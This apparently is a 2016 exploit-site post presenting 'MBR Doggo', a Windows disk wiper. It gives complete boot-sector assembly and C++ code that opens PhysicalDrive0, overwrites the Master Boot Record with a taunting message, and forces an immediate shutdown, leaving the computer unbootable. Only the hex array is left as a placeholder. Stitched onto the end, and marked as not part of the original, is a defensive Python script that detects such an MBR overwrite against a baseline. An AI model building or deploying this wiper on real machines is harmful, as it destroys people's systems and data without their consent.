Windows MBR destroyer
Submitted on 2016-08-10 01:13:34 by Luuk

MBR Doggo

MBR Doggo is a small Windows executable that overwrites your Master Boot Record with custom assembly code, which stops Windows from booting and runs my own assembly code instead.

The MBR has a maximum size of 512 bytes and is located at the very beginning of the disk. The BIOS reads these 512 bytes and checks whether the last two bytes hold the word 0xAA55 (the standard boot signature). If they do, the BIOS executes the code stored in those first 512 bytes; if they don't, the BIOS moves on to the next drive: USB stick, DVD drive and so on.

Assembly

On a normal, working Windows installation the MBR can, for example, contain code that tells the BIOS to start loading code from part XXX of the disk, which in turn loads the OS.

In our case Windows never gets a chance to load, because the MBR has been overwritten with a small piece of code that displays an on-screen message and then drops into an infinite loop.

MBR.asm

BITS 16

start:
    mov ax, 07C0h               ; the BIOS loads the boot sector at 0000:7C00
    add ax, 288                 ; (4096 + 512) / 16 paragraphs past the boot sector
    mov ss, ax                  ; put the stack there...
    mov sp, 4096                ; ...4 KB in size

    mov ax, 07C0h
    mov ds, ax                  ; data segment = boot sector, so labels resolve

    mov si, text_string         ; DS:SI -> message to print
    call print_string

    jmp $                       ; hang forever

text_string db 'You have been visited by the MBR doggo',13,10,'Sleep tite Windows.',0

print_string:                   ; print the 0-terminated string at DS:SI
    mov ah, 0Eh                 ; BIOS teletype output
.repeat:
    lodsb                       ; AL = next byte, SI++
    cmp al, 0
    je .done                    ; stop at the terminator
    int 10h                     ; print the character in AL
    jmp .repeat
.done:
    ret

times 510-($-$$) db 0           ; Pad remainder of boot sector with 0s
dw 0xAA55                       ; The standard PC boot signature

Now, if we write the assembled binary to the boot sector of a USB drive and boot from it in QEMU, we get the following result:

mbr1.png

Great! Now that we know it works, we can write the C++ program that will overwrite the boot sector.

MBRDoggo.cpp

#include <windows.h>
#include <conio.h>
#include <stdio.h>
#include <stdlib.h>   // system()

void ripMBR() {
        DWORD write;
        // MBR payload: the assembled boot sector as a 512-byte array
        char data[] = { (INSERT HEX MBR PAYLOAD HERE) };

        HANDLE disk = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
        WriteFile(disk, data, 512, &write, NULL);
        CloseHandle(disk);

        //MessageBox(0, "Thanks for using MBR doggo!", "Sleep Tite", MB_ICONWARNING);
        system("shutdown -s -t 0");
}

int main() {
        ripMBR();
        return 0;
}

The Payload

I have converted the MBR binary we just created into a comma-separated hex string and stored it in an array. Of course you could read the binary from an external file instead, but I wanted to keep it simple and everything in one .exe file, and this is my way of doing so.

mbr2.png

Example conversion

0xB8,0xC0,0x07,0x05,0x20,0x01,0x8E,0xD0,0xBC, (You get the idea)

That's about it, really. If you run this .exe it will overwrite your MBR and reboot the computer, rendering it unbootable.
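As an added example (not part of the original post), the following Python script is the defender's counterpart to the sector layout described at the top of the post and to the overwrite just described. It splits a 512-byte sector into bootstrap code, partition table and boot signature, then compares a freshly read sector 0 against a known-good baseline and reports exactly the changes this kind of payload leaves behind: replaced bootstrap code, a partition table zeroed out by the `times 510-($-$$) db 0` padding, and the payload's own message string. Both sample sectors are constructed here; the only bytes taken from the post are the nine payload bytes shown in the conversion example and the message string from MBR.asm.

```python
import hashlib
import struct
import sys

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 446      # 446 bytes of bootstrap code come first
PARTITION_ENTRY_SIZE = 16         # four 16-byte entries, 64 bytes in total
SIGNATURE_OFFSET = 510
BOOT_SIGNATURE = 0xAA55           # stored little-endian, so bytes 55 AA on disk


def parse_mbr(sector: bytes) -> dict:
    """Split one 512-byte sector into its bootstrap code, partition table and signature."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly %d bytes, got %d" % (SECTOR_SIZE, len(sector)))
    (signature,) = struct.unpack_from("<H", sector, SIGNATURE_OFFSET)
    partitions = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + i * PARTITION_ENTRY_SIZE
        # status(1) CHS start(3, skipped) type(1) CHS end(3, skipped) LBA start(4) sector count(4)
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", sector, off)
        partitions.append({
            "index": i,
            "bootable": status == 0x80,
            "type": ptype,
            "lba_start": lba_start,
            "sectors": sectors,
            "empty": ptype == 0 and sectors == 0,
        })
    return {
        "signature": signature,
        "signature_ok": signature == BOOT_SIGNATURE,
        "bootstrap_sha256": hashlib.sha256(sector[:PARTITION_TABLE_OFFSET]).hexdigest(),
        "partitions": partitions,
    }


# Strings the post's payload embeds; finding them in sector 0 is a direct indicator.
PAYLOAD_MARKERS = (b"MBR doggo", b"Sleep tite")


def check_mbr(current: bytes, baseline: bytes) -> list:
    """Describe how `current` deviates from a known-good `baseline` sector."""
    cur, base = parse_mbr(current), parse_mbr(baseline)
    findings = []
    if not cur["signature_ok"]:
        findings.append("boot signature missing: BIOS will not boot from this disk")
    if cur["bootstrap_sha256"] != base["bootstrap_sha256"]:
        findings.append("bootstrap code differs from baseline")
    if all(p["empty"] for p in cur["partitions"]) and not all(p["empty"] for p in base["partitions"]):
        findings.append("partition table has been wiped")
    for marker in PAYLOAD_MARKERS:
        if marker in current:
            findings.append("known payload string present: %r" % marker)
    return findings


def _sector(bootstrap: bytes, partition_table: bytes) -> bytes:
    """Assemble a well-formed 512-byte sector from its parts (used for the constructed samples)."""
    return (bootstrap.ljust(PARTITION_TABLE_OFFSET, b"\x00")
            + partition_table.ljust(4 * PARTITION_ENTRY_SIZE, b"\x00")
            + struct.pack("<H", BOOT_SIGNATURE))


# Constructed baseline: stand-in boot code plus one bootable NTFS partition (type 0x07) at LBA 2048.
BASELINE_SECTOR = _sector(
    b"\x33\xC0\x8E\xD0\xBC\x00\x7C" + b"<constructed stand-in for the normal boot loader>",
    struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07, b"\xFE\xFF\xFF", 2048, 204800),
)

# Constructed "after" sector: the nine payload bytes listed in the post, the post's message
# string, and nothing else, which is what the zero padding leaves behind (no partition table).
TAMPERED_SECTOR = _sector(
    bytes([0xB8, 0xC0, 0x07, 0x05, 0x20, 0x01, 0x8E, 0xD0, 0xBC])
    + b"You have been visited by the MBR doggo\r\nSleep tite Windows.\x00",
    b"",
)


def read_sector(path: str) -> bytes:
    """Read sector 0 (512 bytes) from a disk image or a sector dump."""
    with open(path, "rb") as fh:
        return fh.read(SECTOR_SIZE)


if __name__ == "__main__":
    if len(sys.argv) == 3:
        current, baseline = read_sector(sys.argv[1]), read_sector(sys.argv[2])
    else:
        current, baseline = TAMPERED_SECTOR, BASELINE_SECTOR
    for finding in check_mbr(current, baseline) or ["no deviation from baseline"]:
        print("-", finding)
```

Run it with no arguments to see the constructed before/after comparison, or as `python mbr_check.py current.bin baseline.bin` where both files are 512-byte dumps of sector 0 (for instance taken from a disk image before and after the incident). The baseline hash of the bootstrap code is the useful part to keep: a periodic read of sector 0 compared against it catches any overwrite, not only this payload.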

© Esselbr.nl 2016